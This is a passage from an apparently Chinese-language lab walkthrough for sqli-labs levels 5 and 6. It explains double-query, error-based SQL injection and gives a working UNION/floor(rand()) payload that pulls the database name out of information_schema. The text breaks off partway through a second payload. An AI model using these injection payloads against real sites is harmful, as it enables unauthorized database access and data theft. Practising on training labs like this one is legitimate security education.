本文以sqli-labs第五第六关为例,详细原理见我上一篇文章
sqli-labs资源在这:https://github.com/Audi-1/sqli-labs
sqli-labs 5、6双查询报错注入通关
这篇为了代码行语法高亮好看,就把payload中sql语句之前的内容省去了,复制使用时记得在payload前面加上?id=-1'
第六关闭合方式是双引号,所以将payload的单引号改成双引号直接使用即可。
这里的思路,利用双查询的报错提示和information_schema库获得数据库信息,思路可见目录。
文章目录
好,进入正文~
0x01 获取目标库名
报错获得当前的数据库名:
payload:
union select 1,count(*),
concat((select database()),"==",floor(rand()*2)) as a
from information_schema.tables where table_schema='security' group by a --+
获得当前数据库名为security
0x02 获取库中表的数量
information_schema库中有一张tables表,含有数据库所有的表信息,这个表里有一个列table_schema,内容为表所属的数据库,利用这两个属性可以获得security库中的表名信息:
payload:
union select 1,c